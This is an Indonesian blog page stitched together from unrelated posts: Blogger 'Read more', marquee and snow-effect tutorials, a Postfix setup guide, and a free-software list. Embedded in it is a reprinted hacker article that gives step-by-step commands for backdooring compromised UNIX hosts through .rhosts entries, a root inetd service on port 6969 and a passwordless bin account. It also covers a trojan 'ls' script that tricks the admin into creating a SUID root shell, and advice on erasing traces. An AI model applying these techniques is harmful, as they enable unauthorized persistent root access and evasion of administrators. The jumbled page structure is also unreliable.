Read More artinya baca selanjutnya. Mungkin tulisan ini sering kita lihat waktu berkunjung ke sebuah blog seseorang. Awalnya saya menganggap belum perlu membuatnya diblog saya, tapi setelah beberapa lama saya merasa perlu juga. Nah mungkin sekalian sharing saja untuk rekan-rekan blogger yang belum tahu caranya, saya akan coba tulis langkah-langkahnya
Musim panas kaya sekarang ini enaknya yang dingin-dingin apa lagi yang dingin itu ada di blog kita jadi kalo setiap memandang blog jadi terasa sejuk (dah deh ga perlu basa-basi terus terang aja, apa sih yang mo di bahas)
Macam-macam efect marque.....!!! Artikel ini ditujukan untuk memandu mereka yang masih bingung denganterminologi sekuritas jaringan komputer seperti exploit, trojan, dll daningin mengetahui konsep-konsep dasarnya. Terimakasih kepada staf kecoakyang bersedia mempublikasikan artikel ini, terutama LithiumError dan BigDyang telah memberikan masukan-masukan sangat berguna kepada kami. Sepertibiasa, ini hanyalah untuk tujuan informasi saja, dan mungkin sysadmin yangmembaca bisa menggunakan informasi ini untuk melindungi sistem dibawahpengawasan mereka. Artikel ini berisi metode backdoor/trapdoor dankode-kode yang bisa langsung diterapkan, sebab kami ingin agar parapembaca mengetahui bagaimana * tepatnya * metode ybs bekerja. Dan lagi,menyensor informasi bukanlah urusan kami. 1. Eksploit Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen denganshell UNIX baru yang baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudahmulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?". Dalamkonteks per-hacking-an, eksploit tidaklah jauh berbeda dengan artinyadalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit'hacking' lebih spesifik lagi, yang kurang lebih bisa diartikan sebagai'pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluardari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahanpemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, danlain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalaheksploit yang akan memberikan kita akses tidak terbatas ke seluruh aspekdari sebuah sistem. Dalam UNIX, sering kita dengar istilah 'mengeksploitprogram anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root'bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkinanda sudah alami sendiri, kadang sebuah cacat dalam program seperti maildatau ftpd bisa dimanfaatkan untuk tujuan 'header forging', 'ip spoofing','denial of service attack', dan 'mail bombing' (hello, Anton Pardede!). Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal daneksploit remote. Eksploit lokal adalah jenis eksploit yang hanya bisadijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itumelalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,sebab kamu sudah punya akses ke ribuan program yang berpotensi untukdi-eksploit. Contoh - contoh dari eksploit jenis ini adalah bufferoverflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimanadua proses saling berlomba untuk menyelesaikan tugas masing-masing,biasanya proses A disuruh untuk menjalankan suatu utilitas yangmembutuhkan privilese root temporer sementara proses B dirancang untukmencegat proses A sebelum proses A kembali statusnya ke privilese userbiasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadidi mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya bisamendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktuberjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol(lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite'lainnya. Biasanya eksploit diprogram dengan C, perl, atau sh. Namun kalauilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyakeksploit yang sudah didokumentasi dan tersedia melalui websearch, atau disitus-situs tertentu, seperti: atau di situs kecoak, http://k-elektronik.org/arsip/eksploit Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisamengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu sajaeksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadangdampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salahsatu contoh dari pemanfaatan eksploit remote untuk mendapatkan file/etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf).Mungkin belum terlihat fatal, namun sekalinya sang 'cracker' berhasilmasuk ke dalam sistem memanfaatkan login dan password dari salah seoranguser, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkanakses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebihgila lagi, dengan memberikan akses root tanpa password. Apa trik dan tipyang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelassebuah portscanner sangatlah bermanfaat untuk melihat port-port mana sajayang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi,seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akanmemeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari filepassword atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapatdari http://www.l0pht.com. Untuk menghemat waktu, banyak cracker yangmenulis skrip otomasi, jalankan skrip, tinggal berikan daftartarget-target dan tinggalkan untuk sementara waktu. Kembali lagi sejamatau dua jam kemudian, tinggal diperiksa server-server mana saja yang adalobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikelmengenai scanning/probing di situs-situs hacker). Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, sepertieksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain,namun untuk digunakan masih perlu campurtangan dari user lokal untuk bisabekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkanfile password ke alamat email tertentu.) 2. Backdoor Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewatbelakang'. Backdoor berfungsi untuk memberikan sang programmer akses kesuatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentusaja sang programer di sini bisa juga diartikan 'sang penyusup'.Seringkali backdoor memberikan akses tak terbatas kepada siapapun jugayang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar(baik hardware maupun software ) yang sengaja menempatkan backdoor takterdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikelini yang dimaksud adalah backdoor dalam artian memberikan akses root kedalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulanmenyadari bahwa ada penyerang di dalam sistem.Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, danberhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segeramenjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root.Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokanharinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satuatau lebih jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknikbackdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan aksesroot, tetapi untuk mendapatkan akses root LAGI setelah sang sysadminmenutup segala jalan masuk normal. Terkadang sysadmin sering menganggapselama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksidari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker,kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpasepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatifdengan privilese root. Nah, backdoor backdoor ini ada yang memang sudah dari sononya (sepertiBackdoor di router-router, printserver, dll buatan 3Com), namun disiniakan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistemUNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah denganmelalui file /.rhosts: korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts perintah diatas akan menambah satu entri di file .rhosts (sistem luar-dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang bolehmengakses account tanpa password), dan untuk masuk kembali ke sistem dariaccount "ganjaman" di indohack2.ri.go.id : ganjaman@indohack2> rlogin -l root korban.lameisp.net.id poof! shell root tanpa password!Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikanentri berikut dari file /etc/passwd sebuah sistem: bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false tentunya bagi mereka yang sering memanen password entri seperti di atassudah tidak asing lagi. Account diatas adalah account yang digunakan olehUNIX sistem secara internal. Seringkali banyak diantara crackers yangmengambil jalan singkat dan menghapus karakter *, mengakibatkan telnetdengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwafile /etc/passwd biasanya adalah file pertama yang akan diperiksa olehsang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agarkita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts dihome directory milik bin. Kembali ke entri file password diatas, bisa kitalihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin'dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalahini tentunya dengan membuat link dari /bin/false ke /bin/sh atau/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang kerenkung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksakeberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubahentri dari account-account internal dari /bin/false ke /nggak-ada-tuh ataustring unik lainnya yang bukan merupakan nama file. Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernyaini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak adatuh yang namanya root daemon - tapi metode ini benar-benar cocok disebutrootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewatsalah satu port yang didefinisikan dalam "inetd": root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistemyang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketigaperintah diatas:1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomorport lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalahkarangan kamu sendiri sebab setiap service harus punya nama, dan biasanyasysadmin tidak akan begitu curiga dengan nama seperti itu.2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0rsetiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnyamengeksekusi sebuah shell berprivilese root lewat cara ini hanya akanmengakibatkan sang sistem bengong, sebab kita tidak bisa memberikanperintah-perintah selayaknya kita login lewat jalur normal. Sang shellakan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita.Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamulebih pintar dan memilih nama yang tidak begitu mencurigakan seperti/tmp/dev001). Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yangbaru saja kita luncurkan (id=0 - root!). Tentunya kamu bisa saja menulisskrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkansaja perintah yang sudah dibahas diatas, yaitu menambahkan entri darimesin host kita ke file .rhosts milik root.Tentu jika sang admin memang keren kung funya, rlogind akandikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamuperiksa isi direktori dan file "history" milik root dan isinya menunjukkanbahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatasakan memberikan jalan masuk lewat belakang ke dalam sistem target (idih,kesannya kayak cerita-cerita porno anal seks aja!). Sekarang kamu tinggal: ganjaman@indohack2> telnet korban.lameisp.net.id 6969 nah, sistem kamu akan tersambung ke sistem target lewat port 6969,sedangkan daemon inet di mesin korban akan menerima sambungan tersebut,menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dandengan segera menutup kembali sambungan telnet. Sekarang .rhosts milikroot sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembalimenggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sangsysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port6969) kamu tinggal: ganjaman@indohack2> rlogin -l root korban.lameisp.net.id dan, BOOM! Korban# shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemarke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman danSuperCock, atas ilmu ngent... engin badannya ..." :) ). Tapi ingatlah untuksegera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fukamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksiudah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segalaspoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, seranganbisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkanservice-service yang jarang (hampir tidak pernah dipakai) sepertiutilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi. Metode lain yang cukup populer adalah dengan membuat sebuah file denganbit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistemmempunyai program audit keamanan yang akan mensensus seluruh file berbitSUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasihomedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatuprogram yang sudah berjalan / terinstal secara default, seperti xterm dansplitvt, sehingga sebuah option rootshell akan secara otomatisexecv("/bin/sh", "sh", NULL);. Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikelkelas kacangan ini), kamu bisa modifikasi daemon-daemon yang sedangberjalan untuk menerima perintah-perintah hasil karangan kamu sendiri.Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telahberhasil memodifikasi program sendmail di server korban.com (PSM=Pukulan Sinar Matahari): 12@GG> telnet korban.com 25 Trying mesin.korban.com … Connected to mesin.korban.com. Escape character is '^]'. 220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; ... [snip] … PSM_EXEC /bin/cp /bin/sh /tmp/elit Done ... master! PSM_EXEC /bin/chmod 4755 /tmp/elit Done ... master! Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengansegala kerendahan hati minta izin untuk berguru! 3 Trojan Horse Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnyaTrojan Horse hanya efektif jika kamu betul-betul pintar menutupi suatuprogram atau jika sang sysadmin memang betul-betul tolol. Pada prinsipnya,Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamumembuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkanperintah untuk membuka akses di dalam kode game kamu, sedemikian rupasehingga saat sang sysadmin menjalankan program tersebut, tanpadisadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seoranghacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan mempunyaibanyak peminat. Beberapa 'lamers' mendownload skrip tersebut tanpamenyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkanakses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!) 4 Trapdoor Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namundalam artikel ini, 'Trapdoor' diasumsikan sebagai cara yang bisa kitagunakan untuk menjebak (trap) sang sysadmin untuk memberikan kita aksesroot kedalam sistem. Seringkali kita terbentur masalah sistem operasi yangpaling gres, atau sebuah sistem dimana hampir semua eksploit untukmendapatkan root tidak berjalan sama sekali (patched systems). Janganputus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sangsysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamusudah berhari-hari mengoprek sebuah target dengan menggunakan account danpassword seorang user biasa hasil colongan lewat phf, dan sayangnya tidakada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisamengelabui puluhan sysadmin diluar sana.Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedirmilik user yang accountnya kamu 'pinjam'): user1@korban> chmod 700 ~/. Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlumengganti privilesenya ke root jika beliau ingin memeriksa isi direktoriybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang bertugasuntuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuansang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem.Yang langsung terpikir olehmu, jelas, perintah ls. Disinilah letakkelemahan UNIX dibanding ... uh, MS-DOS. Dalam UNIX, seorang sysadmin yangbaik selalu mengetik 'full pathname' dari program manapun yang diajalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuankemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan dalam daftarsearch path. Jadi jika misalnya sang sysadmin melakukan: root# pwd /usr/home/staff/user1 root# ls maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulandalam direktori /usr/home/staff/user1 kita letakkan sebuah skrip bernama'ls'? Heheheh ... cukup menarik, khan. Nah, sekarang kita bisa buat sebuahskrip yang berisi: #!/bin/sh cp /bin/sh /tmp/vi-save-902887 chown root /tmp/vi-save-902887 chmod 4755 /tmp/vi-save-902887 rm ./ls ls simpan skrip tersebut di homedir user1, beri nama "ls" dan user1@korban> chmod +x ls sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untukmengecek isi homedir user1. Jika kamu kebetulan punya login/passwd untukuser2 di mesin yang sama, maka kamu bisa saja 'mengundang' sang admin.Login sebagai user1, dan kirim imel user1@korban> mail root@localhost Subject: "Heheheh ... Kena garap dari belakang!" Hello sysadmin tolol! Mesin kamu sudah kebobolan! Ttd, God of All Hackers, Virus Researchers and Lame Mailbombers, Phardera Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homediruser1 (dengan perintah ls, tentunya), dan tanpa disadari sang sysadmintelah menciptakan sebuah shell root di /tmp/vi-save-902887. Dan, karenavi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam halmenyenangkan dengannya. Tinggal login sebagai user2 beberapa waktukemudian, dan nikmati ketenangan pikiran lewat shell root! Heheheh … Penutup Begitu dulu, deh, penjelasan dari kami. Semoga ada gunannya untuk kaliansemua. Nggak lupa iseng-iseng nereakin seluruh kru IndoHack, hackerindo,underground, dan kecoak elektronik! Postfix adalah mail transfer agent yang dikembangkan oleh Wietse Venema. Beberapa fitur yang ditawarkan oleh Postfix : Berikut sekilas gambaran bagaimana Postfix bekerja : Untuk distribusi TSL (Trustix Secure Linux), Postfix sudah menjadi bagian dari paket instalasi. Yang diperlukan hanyalah mengaktifkannya. Namun jika pada saat instalasi terlewatkan, Postfix bisa diinstal secara manual. Berikut langkah instalasinya : Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 localhost:smtp *:* LISTEN tcp 0 0 *:6000 *:* LISTEN tcp 0 0 *:printer *:* LISTEN raw 0 0 *:icmp *:* 7 raw 0 0 *:tcp *:* 7 # ps ax PID TTY STAT TIME COMMAND 1 ? S 0:06 init [3] 2 ? SW 0:00 [kflushd] 3 ? SW 0:00 [kupdate] 4 ? SW 0:00 [kpiod] 5 ? SW 0:00 [kswapd] 6 ? SW<> 227 ? S 0:00 syslogd -m 0 235 ? S 0:00 klogd 248 ? S 0:00 crond 261 ? S 0:00 lpd 380 tty1 S 0:00 login - sofyan 381 tty2 S 0:00 login - root 382 tty3 S 0:00 /sbin/mingetty tty3 383 tty4 S 0:00 /sbin/mingetty tty4 384 tty5 S 0:00 /sbin/mingetty tty5 385 tty6 S 0:00 /sbin/mingetty tty6 388 tty1 S 0:00 -bash 395 tty2 S 0:00 -bash 527 ? S 0:00 /usr/lib/postfix/master 551 pts/0 S 0:00 /bin/bash 557 pts/0 R 0:00 ps ax Konfigurasi Postfix dilakukan dengan mengedit file konfigurasi postfix yang berada di /etc/postfix/main.cf. Beberapa parameter penting yang perlu di edit untuk memfungsikan Postfix : Berikut contoh konfigurasi dasar; command_directory = /usr/sbin daemon_directory = /usr/lib/postfix mail_owner = postfix default_privs = nobody myhostname = host.trustix.co.id mydomain = trustix.co.id myorigin = $mydomain inet_interfaces = all mydestination = $myhostname, localhost.$mydomain virtual_maps = hash:/etc/postfix/virtual alias_maps = hash:/etc/postfix/aliases alias_database = hash:/etc/postfix/aliases recipient_delimiter = + mail_spool_directory = /var/spool/mail mynetworks = 192.168.21.0/28, 127.0.0.0/8 smtpd_banner = $myhostname ESMTP $mail_name debugger_command = PATH=/usr/bin:/usr/X11R6/bin xxgdb $daemon_directory/$process_name $process_id & sleep 5 Cara yang paling mudah untuk seting Postfix di dalam intranet, adalah mengirimkan semuanya ke mail gateway, dan biarkan mail gateway meneruskan semua emailnya. Beberapa konfigurasi yang perlu ditambahkan myorigin = $mydomain relayhost = gateway.trustix.co.id disable_dns_lookups = yes Jika di dalam Intranet, postfix berperan sebagai host yang mengirimkan email lokal, langsung mengirim mail tanpa melewati mail server gateway, setingnya sebagai berikut : trustix.co.id smtp: .trustix.co.id smtp: host.trustix.co.id local: host.trustix.co.id local: /etc/postfix/main.cf : transport_maps = hash : /etc/postfix/transport Pada host dengan sambungan dialup, Postfix dapat diseting dengan menambahkan parameter berikut : relayhost = smtp.provider.net defer_transports = smtp disable_dns_lookups = yes Untuk seting virtual domain , pastikan di /etc/postfix/main.cf terdapat baris : user@virtual.domain sofyan,root Selesai editing file /etc/postfix/virtual, jalankan : Untuk mengaktifkan aliases cukup mudah. Pertama pastikan baris berikut ada di /etc/postfix/main.cf alias_database = hash:/etc/postfix/aliases MAILER-DAEMON: postmaster postmaster: root bin: root daemon: root named: root nobody: root uucp: root www: root ftp-bugs: root postfix: root # tambahan alias sendiri spawn: sofyan # Well-known aliases manager: root dumper: root operator: root abuse: postmaster decode: root # postfix reload Untuk mengaktifkan POP3 Server (merupakan paket tersendiri, bukan bagian dari postfix) dapat dilakukan dengan cara : Untuk menjalankan test apakah Postfix sudah berjalan dengan baik, bisa dilakukan dengan mengirimkan mail, baik antar user lokal maupun Internet. subject : Test Testing satu dua tiga . Cc: root # $ mail Mail Version 8.1 6/6/93. Type ? for help. ``/var/spool/mail/sofyan'': 1 message 1 new >N sofyan@trustix.co.id Fry Jul 28 12:02 13/447 ``Test'' & (tekan enter) From root@trustix.co.id Fri Jul 28 12:02:01 2000 Return-Path: Delivered-To: sofyan@trustix.co.id Received: by trustix.co.id (Postfix, from userid 0) id E4ACF1C35F; Fri, 28 Jul 2000 12:00:28 +0800 (BORT) To: sofyan@trustix.co.id Subject: Test Cc: root@trustix.co.id Message-Id: <20000728040028.e4acf1c35f@trustix.co.id> Date: Fri, 28 Jul 2000 12:00:28 +0800 (BORT) From: root@trustix.co.id (root) Status: RO Testing satu dua tiga & (tekan enter untuk kembali ke prompt) $ Untuk menjalankan test dari host lain, cukup tunjuk mesin postfix (baik real host maupun virtual host) menjadi SMTP dan POP3 Server. Seting tergantung dari mail client yang dipergunakan. This document was generated using the LaTeX2HTML translator Version 99.2beta5 (1.38) Copyright © 1993, 1994, 1995, 1996, Nikos Drakos, Computer Based Learning Unit, University of Leeds. The command line arguments were:
Step#1 Update kode HTML pada Template Blog
Sebelum anda melakukan perubahan pada kode HTML sebaiknya anda lakukan backup template terlebih dahulu agar aman. Setelah itu coba cari kode
Setelah anda memastikan kode diatas diletakkan ditempat yang sebenarnya langkah selanjutnya adalah meletakkan kode dibawah ini tepat setelah kode
Read more...
Sudah, oh ya jangan khawatir dengan keberadaan tag ini memang yang sebenarnya dan tidak akan menimbulkan error. Nah sampai disini proses update kode HTML pada Template telah selesai.
Step#2 Menambahkan Tag Class Pada Setting Posting Template
Untuk langkah ini anda harus menuju ke account Blogger dan masuk menu 'Setting' --> 'Format' dan setelah itu turunkan scroll anda sampai dibagian bawah halaman untuk menemukan setting 'Post Template', kemudian sisipkan kode dibawah ini.
Maksud dari memasukkan kode diatas pada 'Post Template' adalah agar pada saat anda akan memasukkan sebuah posting baru, maka secara otomatis tag diatas sudah ditambahkan jadi anda tidak perlu mencari-cari lagi...Lanjuut
Step#3 Memulai Membuat Posting Baru
Ok langsung saja, bila anda ingin membuat posting baru lakukan langkah seperti biasanya. Coba lihat yang terjadi, pada layar entri pasti sudah ada kode / tag dan . Tuliskan posting yang akan ditampilkan kemudian letakkan kode sebagai pembatas antara cuplikan posting yang ditampilkan dan isi posting yang disembunyikan. Selanjutnya jangan lupa akhir dari posting dibatasi dengan kode . Dibawah ini adalah gambar contoh penulisan posting yang benar untuk menampilkan Read more pada setiap posting kita.
Demikian Tulisan saya mengenai bagaimana cara menambar script Read more pada setiap posting yang ditampilkan... Akhir kata jangan lupa setelah itu klik Publish Post ya
Meneeruskan baca......
Minggu, 10 Januari 2010
Marquee
Pada postingan kali ini Blog Tips and Trick akan membahas mengenai beberapa fungsi attribut dari efek Marquee yang biasa digunakan untuk membuat suatu object seperti teks atau gambar bergerak. Marquee mungkin bisa dikatakan adalah salah satu bahasa html yang berfungsi untuk menggerakan suatu object. tapi fungsi dari marquee tersebut tidak akan terjadi tanpa didukung oleh beberapa attribut seperti dibawah berikut ini.
1. Behavior : yaitu untuk mengatur gaya gerakan pada gambar ataupun teks. biasanya ada 3 gaya gerakan yang bisa digunakan, diantaranya yaitu :
* Alternate : yaitu untuk menggerakan gambar atau teks secara bolak-balik
* Slide : yaitu untuk menggerakan gambar atau teks berjalan ke satu arah sekali saja
* Scroll : yaitu untuk menggerakan gambar atau teks ke satu arah secara Continue
2. Direction : yaitu untuk mengatur arah gerakan gambar ataupun teks.biasanya ada 4 arah gerakan yang bisa kita digunakan yaitu :
* Up : Untuk menggerakan suatu object bergerak keatas
* Down : Untuk menggerakan suatu object bergerak kebawah
* Left : Untuk menggerakan suatu object bergerak kekiri
* Right : Untuk menggerakan suatu object bergerak kekanan
4. Face : Untuk mengatur jenis font / teks seperti : arial, verdana, times new roman, courier, dan lain sebagainya.
5. Width : Untuk mengatur ukuran panjang atau Lebar ruangan gambar/teks dalam satuan pixel.
6. Height : Untuk mengatur ukuran Tinggi ruangan gambar/teks dalam satuan pixel
8. Scrolldelay : Untuk mengatur ukuran waktu tunda gerakan dalam satuan per mili detik
9. Scrollamount : Untuk mengatur ukuran kecepatan gerakan dalam satuan pixel.
10. Loop : Untuk mengatur ukuran jumlah pengulangan.
Bila anda ingin membuat animasi berupa gambar, maka beberapa attribut maka kode untuk fontnya tidak usah dipakai atau dihapus. contohnya seperti pada kode dibawah ini.
Masukan link image source anda pada bagian kode tersebut, tepatnya sebelum kode . misalnya untuk animasi gambar di atas saya memakai gambar emoticon. image sourcenya yaitu :
Blia anda ingin memperbanyak gambar pada tampilan animasi tersebut, anda cukup memasukan atau mempaste link image source anda tepat sebelum kode . misalnya seperti dibawah ini.
Meneeruskan baca......
Macam-macam efect salju
Sabar, tenang, biar bisa ngikutin tutorial kali ini.Seperti judul posting ini kali ini kita akan memasukkan efek salju (aku menyebutnya efek ketombe) kedalam blog kita, yang beda dengan salju kebanyakan (warna putih) disini aku mo kasih kamu salju yang beraneka warna.jadi bisa dipilih dengan warna kesukaan kamu.
Untuk memulai prosesnya ikuti langkah berikut:
1. Login ke Blogger klik Layout/Tata Letak ----> Edit HTML
2. Cari Kode Kalo dah Ketemu CopyPaste kode/Script efek salju di bawahnya,
Silahkan Pilih warna salju yang kamu suka, Tapi ingat Hanya meletakkan SATU Script efek salju berwarna, Jika lebih dari satu maka skrip efek salju berwarna yang paling atas-lah yang hanya muncul.
Hanya mengkopy Mulai dari code
3. Simpan dan lihat blog kamu, selamat menikmati efek baru.
Note: Kalo ga muncul efek saljunya coba aja letakkan script saljunya di atas tag . dan agar tampilan salju terlihat jelas selaraskan dengan warna background blog kamu, contoh jika background blog kamu warna hitam pakai efek salju warna putih,kuning,d,l,l, jika warna background blog kamu putih pakai warna merah,hitam, dan sebagainya.Intinya jangan pasang efek salju yang warnanya sama dengan warna dominan blog kamu.
diambil dari : http://tut0rial.multiply.com/journal/item/2
Meneeruskan baca......
Macam-macam Efect marquee
Menambahkan teks bergulir sederhana:
Berikut adalah kode untuk menambahkan teks bergulir sederhana dari kanan ke kiri
contoh scrolling text sederhana
Menambahkan Background Warna Pada Teks Bergulir
Jika Anda menginginkan warna yang lain ,cukup mengganti kode #99CCFF
Merubah Arah Text Bergulir Ke Kanan
Merubah Arah Text Bergulir Ke Atas
Merubah Arah Text Bergulir Ke Bawah
Membuat Teks Bergulir Bolak-Balik
Mengatur Kecepatan Guliran Teks
Yang Anda lakukan adalah menambahkan kata scrollamount="2"
Menghentikan Teks Ketika Tersentuh Cursor/Mouse
Menambahkan Hyperlink / Alamat Situs
Membuka Pada Jendela Yang Sama
Hasilnya akan seperti dibawah ini
Membuka Pada Jendela Baru
diambil dari : http://sulthanyusuf.blogspot.com/2009/09/script-html-code-scrolling-text-marquee.html
Meneeruskan baca......
Sofware windows yang gratisan.....!!!
Daftar website penyedia software windows gratis
Bagi saudara yang masih menggunakan OS windows tentunya jika membutuhkan software tambahan baik aplikasi office, multimedia, compression, audio /video dll, harus merogoh kocek lagi untuk membeli, kecuali bagi anda yang suka membajak. namun jangan khawatir bagi anda yang berkantong cekak seperti saya tanpa harus membajak, bisa mendapatkan software-software tersebut secara gratis dan legal.
berikut daftar website yang menyediakan bermacam-macam software untuk windows anda secara gratis, anda bisa mendownload sepuas-puasnya.
Office
OpenOffice - office suite
PC Suite 602 - office suite
AbiWord - text editor
Atlantis Nova - text editor
Microsoft PowerPoint Viewer - power point files viewer
Adobe Reader - pdf reader
Foxit PDF Reader - pdf reader
PDFCreator - create pdf documents
Doc Convertor - document convertor
Convert - unit convertor
Converber - unit convertor
Sunbird - calendar/organizer
EssentialPIM Free - calendar/organizer
PhraseExpress - speed up your writing
ATnotes - create notes on the desktop
Compression
7-Zip - compression program
IZArc - compression program
TugZIP - compression program
CabPack - compression program
Universal Extractor - extract files from any type of archive
Internet
Firefox - web browser
Internet Explorer- web browser
Maxthon - web browser
Opera - web browser
Avant Browser - web browser
Thunderbird - email client
PopTray - check for emails
